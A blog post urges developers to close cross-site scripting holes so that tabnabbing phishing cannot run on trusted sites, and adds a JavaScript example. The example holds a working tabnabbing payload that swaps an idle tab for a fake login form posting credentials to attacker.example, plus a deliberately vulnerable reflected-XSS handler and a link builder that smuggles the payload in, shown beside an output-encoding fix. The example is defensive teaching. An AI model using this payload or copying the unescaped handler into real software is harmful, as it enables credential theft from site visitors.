Friday, May 28, 2010

Tabnabbing! Nasty, AVOIDABLE stuff!

Have you read the news about the newest type of phishing attack, "tabnabbing"? Nasty, nasty stuff. It is sneaky and believable: a script waits until you switch away to another tab, then quietly rewrites the page you left behind (title, favicon and all) into a familiar-looking login form, so when you come back you "log in again" and hand your password to the attacker. Script-blocking add-ons don't help when the script is running on a site you have already allowed.

I've now read several articles on it, and I am once again floored by the "what's the band-aid?" mentality and the "how to browse safely" focus of everyone!

Analogy: there is a machine making gaping holes in your street's sidewalk. You inform people about the latest hole. You analyze the hole and how to walk around it. You explain how to avoid it in the dark, or how to spot new holes as they appear. But no one thinks about stopping the machine that is making the darn holes!! If the machine can't be turned off, then at least blockade your street from it. If everyone did that, holes would be far less frequent and far less dangerous!

Read any of those articles. Did you pick up the key clue to stopping it? I've been harping on it; come on, you should know this one by now! Yup, XSS! The demo runs the script on a page the attacker controls, but the attack becomes truly convincing when that same script runs on a friendly site's page, in that site's own origin, where the victim's browser already allows scripts and the address bar shows a name the victim trusts. How'd it get there? Hmmmmm... SOME DEVELOPER LEFT THE DOOR OPEN ON THE FRIENDLY SITE!

This attack (and many others) becomes much harder to pull off when developers close their XSS holes: treat every piece of user-supplied data as data, never as markup, and encode it for the context it lands in (HTML text, attribute value, URL, script) before writing it into a page.
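To make the point concrete, here is an added example (mine, not from the original post or any of the articles it mentions). It has two halves: a constructed tabnabbing payload of the kind the attack runs in the victim's browser, and a reflected-XSS hole on a hypothetical "friendly" site that would let an attacker plant that payload in the trusted site's own origin, shown next to the output-encoding fix that closes it. The hostnames (friendly.example, attacker.example), the ?name= parameter and all function names are illustrative assumptions.

```javascript
// Added example, not code from the original post. Hostnames, the ?name=
// parameter and function names are illustrative assumptions.

// --- The attacker's payload (constructed). Delivered into a page, it waits
// until the tab loses focus, then rewrites title, favicon and body so the idle
// tab looks like a login page for a site the victim trusts. Anything typed
// into the fake form is posted to the attacker.
const TABNAB_PAYLOAD = `<script>
window.addEventListener('blur', function () {
  setTimeout(function () {
    document.title = 'Sign in - Example Mail';                 // fake title
    var icon = document.querySelector('link[rel~="icon"]') ||
               document.head.appendChild(document.createElement('link'));
    icon.rel = 'icon';
    icon.href = 'https://attacker.example/mail-favicon.ico';   // fake favicon
    document.body.innerHTML =
      '<form action="https://attacker.example/collect" method="post">' +
      'Email <input name="u"> Password <input name="p" type="password">' +
      '<button>Sign in</button></form>';
  }, 5000);
}, { once: true });
</script>`;

// --- The "friendly" site's page handler, vulnerable form. It reflects a
// query parameter straight into the HTML it returns, so whatever arrives in
// ?name= becomes part of the trusted site's page and runs in its origin.
function renderGreetingVulnerable(requestUrl) {
  const name = new URL(requestUrl).searchParams.get('name') || 'friend';
  return '<!doctype html><html><head><title>Friendly Site</title></head>' +
         '<body><p>Welcome back, ' + name + '!</p></body></html>';
}

// --- Output encoding: the fix the post is asking developers to apply.
// Encodes the five characters that can change meaning in HTML text or in a
// quoted attribute value. Untrusted data is data, never markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Same handler with the hole closed: the parameter is encoded before it is
// written into the page, so the payload is displayed as text, not executed.
function renderGreetingHardened(requestUrl) {
  const name = new URL(requestUrl).searchParams.get('name') || 'friend';
  return '<!doctype html><html><head><title>Friendly Site</title></head>' +
         '<body><p>Welcome back, ' + escapeHtml(name) + '!</p></body></html>';
}

// Builds the link an attacker would e-mail or post: the trusted site's own
// hostname in the address bar, with the payload smuggled in the parameter.
function attackerLink(payload) {
  const u = new URL('https://friendly.example/welcome');
  u.searchParams.set('name', payload);
  return u.toString();
}

// Crude check used only to show the difference between the two responses:
// does the HTML contain a live <script> element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Demonstration on the constructed attacker link.
const link = attackerLink(TABNAB_PAYLOAD);
console.log('vulnerable page carries live script:', containsScriptTag(renderGreetingVulnerable(link)));
console.log('hardened page carries live script:  ', containsScriptTag(renderGreetingHardened(link)));
```

Note what the hardened version does not do: it does not try to recognise and strip "bad" input. It encodes everything, so the same fix covers payloads nobody has thought of yet. A value that lands in a different context (inside a URL, an event handler attribute, or a script block) needs the encoding for that context rather than this HTML-text escaper.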

Is your site going to be the next headline about poor programming? No more excuses! Close the XSS holes!
